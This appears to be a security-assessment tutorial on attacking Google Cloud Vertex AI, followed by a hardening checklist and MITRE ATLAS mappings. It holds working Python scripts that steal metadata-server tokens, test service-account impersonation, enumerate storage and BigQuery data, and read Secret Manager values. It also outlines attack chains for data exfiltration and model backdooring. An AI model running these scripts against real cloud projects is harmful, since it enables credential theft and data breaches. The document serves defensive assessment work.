GCP Vertex AI Attack Surface
Security assessment of Google Cloud Vertex AI -- service account exploitation, endpoint security, notebook attacks, and pipeline manipulation.
Vertex AI Architecture
GCP Vertex AI provides managed ML services integrated with Google Cloud's IAM, networking, and storage systems. Resources are organized by GCP projects and use service accounts for authentication.
Key Components
| Component | Identity | Storage | Network |
|---|---|---|---|
| Workbench | Service account | GCS | VPC optional |
| Training Jobs | Custom service account | GCS input/output | VPC optional |
| Endpoints | Service account | Model in GCS/AR | Internet-facing |
| Pipelines | Pipeline SA | GCS artifacts | VPC |
| Feature Store | Featurestore SA | BigTable/BigQuery | VPC |
Attack Techniques
1. Service Account Token Extraction
Vertex AI Workbench instances (formerly AI Platform Notebooks) run with a GCP service account. The GCP metadata server at metadata.google.internal provides access tokens without requiring any additional authentication -- any code executing on the instance can obtain tokens for the attached service account.
Unlike AWS IMDS, GCP's metadata server requires only a Metadata-Flavor: Google header, which is trivially added. The primary risk is that Workbench service accounts are often granted the Editor role on the project, giving them write access to nearly every GCP resource.
import requests
# From inside a Vertex AI Workbench instance
# GCP metadata server for service account tokens
metadata_url = "http://metadata.google.internal/computeMetadata/v1"
headers = {"Metadata-Flavor": "Google"}
# Get the service account
sa = requests.get(
f"{metadata_url}/instance/service-accounts/default/email",
headers=headers
).text
print(f"Service Account: {sa}")
# Get an access token
token = requests.get(
f"{metadata_url}/instance/service-accounts/default/token",
headers=headers
).json()["access_token"]
# Enumerate accessible projects
projects = requests.get(
"https://cloudresourcemanager.googleapis.com/v1/projects",
headers={"Authorization": f"Bearer {token}"}
).json()
for p in projects.get("projects", []):
print(f"Project: {p['name']} ({p['projectId']})")Full Metadata Enumeration
import requests
metadata_url = "http://metadata.google.internal/computeMetadata/v1"
headers = {"Metadata-Flavor": "Google"}
def get_metadata(path):
"""Recursively enumerate metadata entries."""
resp = requests.get(
f"{metadata_url}/{path}",
headers={**headers, "Accept": "application/json"},
params={"recursive": "true"}
)
return resp.json() if resp.status_code == 200 else resp.text
# Instance metadata
instance = get_metadata("instance")
print(f"Instance name: {instance.get('name')}")
print(f"Zone: {instance.get('zone')}")
print(f"Machine type: {instance.get('machineType')}")
# Network interfaces (discover VPC, subnet, external IP)
for iface in instance.get('networkInterfaces', []):
print(f"Network: {iface.get('network')}")
print(f" Internal IP: {iface.get('ip')}")
for ac in iface.get('accessConfigs', []):
print(f" External IP: {ac.get('externalIp')}")
# All service accounts and their scopes
for sa_email in instance.get('serviceAccounts', {}):
sa_info = instance['serviceAccounts'][sa_email]
print(f"\nService Account: {sa_email}")
print(f" Scopes: {sa_info.get('scopes', [])}")
# Project-level metadata (may contain secrets set by admins)
project = get_metadata("project")
for key, value in project.get('attributes', {}).items():
print(f"Project attribute: {key} = {str(value)[:100]}")
if any(kw in key.lower() for kw in
['key', 'secret', 'password', 'token', 'credential']):
print(f" [!] Potentially sensitive project attribute")
# Check for custom instance attributes
for key, value in instance.get('attributes', {}).items():
print(f"Instance attribute: {key} = {str(value)[:100]}")Service Account Privilege Escalation
GCP service accounts can impersonate other service accounts if they have the iam.serviceAccountTokenCreator role. This creates privilege escalation chains that are not visible from the Workbench instance itself.
import requests
import json
def check_sa_impersonation(token, project_id, source_sa):
"""Check if the current service account can impersonate others."""
headers = {"Authorization": f"Bearer {token}"}
# List all service accounts in the project
sa_url = (
f"https://iam.googleapis.com/v1/projects/{project_id}"
f"/serviceAccounts"
)
sas = requests.get(sa_url, headers=headers).json()
for sa in sas.get('accounts', []):
sa_email = sa['email']
if sa_email == source_sa:
continue
# Attempt to generate an access token for this SA
impersonate_url = (
f"https://iamcredentials.googleapis.com/v1/projects/-"
f"/serviceAccounts/{sa_email}:generateAccessToken"
)
resp = requests.post(
impersonate_url,
headers={
"Authorization": f"Bearer {token}",
"Content-Type": "application/json"
},
json={"scope": ["https://www.googleapis.com/auth/cloud-platform"]}
)
if resp.status_code == 200:
print(f"[!] Can impersonate: {sa_email}")
impersonated_token = resp.json()['accessToken']
# Test what this SA can access
test_permissions(impersonated_token, project_id)
else:
print(f"Cannot impersonate: {sa_email}")
def test_permissions(token, project_id):
"""Quick permission check for an access token."""
headers = {"Authorization": f"Bearer {token}"}
tests = {
"BigQuery": f"https://bigquery.googleapis.com/bigquery/v2/projects/{project_id}/datasets",
"GCS": "https://storage.googleapis.com/storage/v1/b?project=" + project_id,
"Compute": f"https://compute.googleapis.com/compute/v1/projects/{project_id}/zones",
"SecretManager": f"https://secretmanager.googleapis.com/v1/projects/{project_id}/secrets",
}
for service, url in tests.items():
resp = requests.get(url, headers=headers)
status = "accessible" if resp.status_code == 200 else "denied"
print(f" {service}: {status}")2. Vertex AI Endpoint Enumeration
Vertex AI endpoints serve model predictions. By default, endpoints require IAM authentication, but misconfigurations such as allUsers or allAuthenticatedUsers bindings on the endpoint resource can expose models publicly.
from google.cloud import aiplatform
aiplatform.init(project="my-project", location="us-central1")
# List all endpoints
endpoints = aiplatform.Endpoint.list()
for endpoint in endpoints:
print(f"Endpoint: {endpoint.display_name}")
print(f" Resource: {endpoint.resource_name}")
print(f" Models: {[m.display_name for m in endpoint.list_models()]}")
# Test prediction
try:
result = endpoint.predict(instances=[{"text": "test"}])
print(f" Prediction: {result.predictions[:1]}")
except Exception as e:
print(f" Error: {e}")Endpoint IAM Policy Analysis
import requests
def analyze_endpoint_iam(token, project_id, location, endpoint_id):
"""Check IAM policy on a Vertex AI endpoint for overly permissive access."""
headers = {
"Authorization": f"Bearer {token}",
"Content-Type": "application/json"
}
resource = (
f"projects/{project_id}/locations/{location}"
f"/endpoints/{endpoint_id}"
)
url = (
f"https://{location}-aiplatform.googleapis.com/v1/{resource}"
f":getIamPolicy"
)
resp = requests.post(url, headers=headers, json={})
policy = resp.json()
findings = []
for binding in policy.get('bindings', []):
role = binding['role']
members = binding['members']
# Check for overly permissive access
for member in members:
if member in ('allUsers', 'allAuthenticatedUsers'):
findings.append({
"severity": "CRITICAL",
"finding": f"Endpoint publicly accessible: "
f"{member} has {role}"
})
elif member.startswith('domain:'):
findings.append({
"severity": "MEDIUM",
"finding": f"Domain-wide access: {member} has {role}"
})
return findings
# Also check for endpoints exposed via API Gateway or Cloud Endpoints
def check_api_gateway_exposure(token, project_id):
"""Check if Vertex AI endpoints are exposed via API Gateway."""
headers = {"Authorization": f"Bearer {token}"}
url = (
f"https://apigateway.googleapis.com/v1/projects/{project_id}"
f"/locations/-/apis"
)
resp = requests.get(url, headers=headers)
for api in resp.json().get('apis', []):
print(f"API Gateway: {api['displayName']} - {api['name']}")3. GCS Training Data Access
Vertex AI stores training data, model artifacts, pipeline outputs, and TensorBoard logs in Google Cloud Storage. GCS bucket naming is less predictable than SageMaker's convention, but bucket labels and IAM policies reveal ML-related buckets.
from google.cloud import storage
client = storage.Client()
# List buckets looking for ML data
for bucket in client.list_buckets():
if any(kw in bucket.name.lower() for kw in ['ml', 'training', 'data', 'model', 'vertex']):
print(f"\nBucket: {bucket.name}")
blobs = list(bucket.list_blobs(max_results=10))
for blob in blobs:
print(f" {blob.name} ({blob.size} bytes)")Deep GCS Enumeration and Sensitive Data Discovery
from google.cloud import storage
import json
client = storage.Client()
def enumerate_ml_buckets(client):
"""Comprehensive ML bucket discovery and content analysis."""
ml_keywords = ['ml', 'training', 'data', 'model', 'vertex', 'pipeline',
'experiment', 'tensorboard', 'artifact', 'feature']
sensitive_extensions = ['.csv', '.parquet', '.jsonl', '.pkl', '.pickle',
'.pt', '.pth', '.h5', '.pb', '.onnx']
for bucket in client.list_buckets():
# Check bucket name and labels
is_ml = any(kw in bucket.name.lower() for kw in ml_keywords)
labels = bucket.labels or {}
is_ml = is_ml or any(kw in str(labels).lower() for kw in ml_keywords)
if not is_ml:
continue
print(f"\n{'='*60}")
print(f"Bucket: {bucket.name}")
print(f" Location: {bucket.location}")
print(f" Storage class: {bucket.storage_class}")
print(f" Labels: {labels}")
print(f" Versioning: {bucket.versioning_enabled}")
print(f" Public: {bucket.iam_configuration.public_access_prevention}")
# Check bucket IAM policy
try:
policy = bucket.get_iam_policy()
for role, members in policy.items():
for member in members:
if member in ('allUsers', 'allAuthenticatedUsers'):
print(f" [CRITICAL] Public access: {member} -> {role}")
except Exception as e:
print(f" Cannot read IAM: {e}")
# Enumerate contents looking for sensitive data
sensitive_files = []
total_size = 0
for blob in bucket.list_blobs(max_results=100):
total_size += blob.size
if any(blob.name.endswith(ext) for ext in sensitive_extensions):
sensitive_files.append({
"name": blob.name,
"size": blob.size,
"updated": str(blob.updated)
})
print(f" Total size (sampled): {total_size / 1e6:.1f} MB")
if sensitive_files:
print(f" Sensitive files found: {len(sensitive_files)}")
for f in sensitive_files[:10]:
print(f" {f['name']} ({f['size']} bytes)")
# Also check BigQuery datasets (common for feature stores)
def check_bigquery_datasets(token, project_id):
"""Enumerate BigQuery datasets that may contain ML features or training data."""
import requests
headers = {"Authorization": f"Bearer {token}"}
url = f"https://bigquery.googleapis.com/bigquery/v2/projects/{project_id}/datasets"
resp = requests.get(url, headers=headers)
for ds in resp.json().get('datasets', []):
ds_ref = ds['datasetReference']
print(f"BigQuery dataset: {ds_ref['datasetId']}")
# Check for ML-related tables
tables_url = (
f"https://bigquery.googleapis.com/bigquery/v2/projects/"
f"{project_id}/datasets/{ds_ref['datasetId']}/tables"
)
tables = requests.get(tables_url, headers=headers).json()
for table in tables.get('tables', []):
print(f" Table: {table['tableReference']['tableId']}")4. Pipeline Artifact Extraction
Vertex AI Pipelines (based on Kubeflow Pipelines) orchestrate ML workflows. Pipeline runs contain artifacts including trained models, evaluation metrics, dataset references, and hyperparameters. Compromising pipeline access reveals the entire ML workflow and its data dependencies.
from google.cloud import aiplatform
# List pipeline runs and their artifacts
for run in aiplatform.PipelineJob.list():
print(f"Pipeline: {run.display_name}")
print(f" State: {run.state}")
print(f" Created: {run.create_time}")
# Pipeline artifacts contain model files, metrics, and parameters
for detail in run.task_details:
print(f" Task: {detail.task_name}")
for artifact in detail.outputs.values():
print(f" Output: {artifact}")Pipeline Template and Configuration Extraction
from google.cloud import aiplatform
import json
def extract_pipeline_details(project_id, location):
"""Extract pipeline templates and configurations that reveal
the full ML workflow."""
aiplatform.init(project=project_id, location=location)
for run in aiplatform.PipelineJob.list():
print(f"\n{'='*60}")
print(f"Pipeline: {run.display_name}")
print(f" State: {run.state}")
print(f" Service Account: {run.service_account}")
print(f" Network: {run.network}")
# Extract pipeline spec (the workflow definition)
if hasattr(run, 'pipeline_spec'):
spec = run.pipeline_spec
# Pipeline specs reveal component images, input/output locations,
# and the full data flow
if 'components' in spec:
for comp_name, comp in spec['components'].items():
print(f" Component: {comp_name}")
if 'executorLabel' in comp:
print(f" Executor: {comp['executorLabel']}")
# Extract runtime parameters (may contain sensitive values)
if hasattr(run, 'runtime_config'):
config = run.runtime_config
if 'parameters' in config:
for param_name, param_value in config['parameters'].items():
value_str = str(param_value)[:100]
print(f" Param: {param_name} = {value_str}")
if any(kw in param_name.lower() for kw in
['key', 'secret', 'token', 'password']):
print(f" [!] Potentially sensitive parameter")
# Also check Vertex AI Metadata Store for experiment tracking
print("\n=== Metadata Store (Experiments) ===")
for experiment in aiplatform.Experiment.list():
print(f"Experiment: {experiment.name}")5. Secret Manager Exploitation
GCP Secret Manager is the recommended way to store credentials, but Vertex AI service accounts may have overly broad access to secrets beyond what ML workflows require.
import requests
def enumerate_secrets(token, project_id):
"""Enumerate and attempt to access Secret Manager secrets."""
headers = {"Authorization": f"Bearer {token}"}
# List all secrets
url = (
f"https://secretmanager.googleapis.com/v1/projects/{project_id}"
f"/secrets"
)
resp = requests.get(url, headers=headers)
secrets = resp.json().get('secrets', [])
for secret in secrets:
secret_name = secret['name'].split('/')[-1]
print(f"\nSecret: {secret_name}")
print(f" Created: {secret.get('createTime')}")
labels = secret.get('labels', {})
print(f" Labels: {labels}")
# Attempt to access the latest version
version_url = (
f"https://secretmanager.googleapis.com/v1/"
f"{secret['name']}/versions/latest:access"
)
version_resp = requests.get(version_url, headers=headers)
if version_resp.status_code == 200:
import base64
payload = version_resp.json()['payload']['data']
decoded = base64.b64decode(payload).decode('utf-8', errors='replace')
print(f" [!] Accessible - Value: {decoded[:50]}...")
else:
print(f" Access denied ({version_resp.status_code})")Defensive Assessment Checklist
| Control Area | What to Verify | MITRE ATLAS Reference |
|---|---|---|
| Service Accounts | Least-privilege roles, no Editor or Owner on Workbench SAs | AML.T0003 (ML Model Access) |
| Metadata Server | Custom metadata attributes do not contain secrets | AML.TA0008 (Collection) |
| Network | VPC Service Controls, Private Google Access, no public IPs on Workbench | AML.T0002 (Active Scanning) |
| GCS | Uniform bucket-level access, no allUsers bindings, encryption | AML.T0000 (Search for Data) |
| Endpoints | IAM-only authentication, no public access bindings | AML.T0003 (ML Model Access) |
| Secrets | Scoped Secret Manager access, audit logging | AML.TA0008 (Collection) |
| Pipelines | Pipeline SA separate from Workbench SA, no secrets in parameters | AML.T0018 (Backdoor ML Model) |
| Logging | Cloud Audit Logs enabled, Data Access logs for GCS and BigQuery | AML.TA0006 (Defense Evasion) |
Recommended Hardening
- Use dedicated service accounts per Workbench instance with only the IAM roles needed for that user's work, never
EditororOwner. - Enable VPC Service Controls to create a security perimeter around ML resources, preventing data exfiltration even with valid credentials.
- Use Workload Identity Federation instead of service account keys wherever possible.
- Enable Cloud Audit Logs with Data Access logging for GCS, BigQuery, and Vertex AI API calls.
- Remove public IPs from Workbench instances and use IAP (Identity-Aware Proxy) tunnels for access.
- Enforce organization policies such as
constraints/iam.disableServiceAccountKeyCreationandconstraints/compute.requireShieldedVm. - Use Customer-Managed Encryption Keys (CMEK) for GCS buckets, BigQuery datasets, and Vertex AI resources.
- Implement VPC-SC ingress/egress rules to restrict which identities and services can access the ML perimeter.
Common Attack Chains
Chain 1: Workbench to Project Takeover
1. Initial access via compromised user credentials or malicious notebook
2. Extract service account token from GCP metadata server
3. Discover the SA has Editor role on the project (common misconfiguration)
4. Enumerate all project resources: GCS, BigQuery, Compute Engine, GKE
5. Access Secret Manager to extract API keys and database credentials
6. Test service account impersonation for SAs in other projects
7. If impersonation succeeds, pivot to other projects in the organizationChain 2: Pipeline-Based Data Exfiltration
1. Access Vertex AI Pipelines via compromised service account
2. Extract pipeline templates to understand data flow
3. Identify GCS buckets and BigQuery tables used for training data
4. Access training datasets containing PII or proprietary data
5. Exfiltrate data to attacker-controlled GCS bucket (if VPC-SC absent)
6. Use extracted data for model replication or competitive intelligenceChain 3: Model Artifact Tampering
1. Enumerate GCS buckets containing model artifacts
2. Download the production model artifact
3. Inject a backdoor (e.g., trojan trigger in the model weights)
4. Upload modified artifact to the same GCS path
5. If model versioning is not enforced, the next deployment loads the
backdoored model
6. Backdoor activates on specific trigger inputs in productionGCP-Specific Risks
GCP presents several unique risks compared to AWS and Azure in the ML security context:
| GCP-Specific Risk | Description | Mitigation |
|---|---|---|
| Default Compute Engine SA | Vertex AI may use the default CE service account, which has Editor on the project | Create dedicated SAs with minimum roles |
| Organization policy gaps | Organization policies may not cover Vertex AI-specific resources | Extend org policies to cover aiplatform.* constraints |
| VPC-SC complexity | VPC Service Controls are powerful but complex; misconfigured perimeters create false sense of security | Regular VPC-SC configuration audits |
| BigQuery integration | Vertex AI Feature Store uses BigQuery, which may contain non-ML sensitive data | Separate BigQuery datasets for ML features |
| Artifact Registry shared repos | ML container images may share repos with non-ML containers | Dedicated repos for ML images with strict IAM |
MITRE ATLAS Mapping for Vertex AI Attacks
| Attack Technique | ATLAS ID | Vertex AI-Specific Context |
|---|---|---|
| Metadata server token extraction | AML.TA0002 (Initial Access) | Workbench service account with broad project access |
| GCS data enumeration | AML.T0000 (Search for Victim's Data) | ML buckets discoverable by labels and naming |
| Endpoint probing | AML.T0002 (Active Scanning) | Vertex AI endpoints may have public IAM bindings |
| Model extraction via prediction API | AML.T0024 (Model Extraction) | High-query-volume attacks via Vertex AI Prediction |
| Pipeline artifact tampering | AML.T0018 (Backdoor ML Model) | GCS model artifacts modifiable if bucket IAM is weak |
| Feature Store poisoning | AML.T0020 (Data Poisoning) | BigQuery/Bigtable feature data modification |
Related Topics
- Cloud AI Infrastructure -- Cross-platform overview
- AWS SageMaker -- AWS comparison
- Azure ML -- Azure comparison
References
- Google Cloud Vertex AI Security Overview - Google Cloud (2024) - Official security architecture documentation
- "GCP Service Account Best Practices" - Google Cloud (2024) - Limiting service account scope and key management
- "Securing AI Workloads on Google Cloud" - Google Cloud Architecture Center (2024) - ML security architecture patterns
- "BeyondProd: A New Approach to Cloud-Native Security" - Google (2019) - GCP security model foundations
What is the primary lateral movement path from a compromised Vertex AI Workbench instance?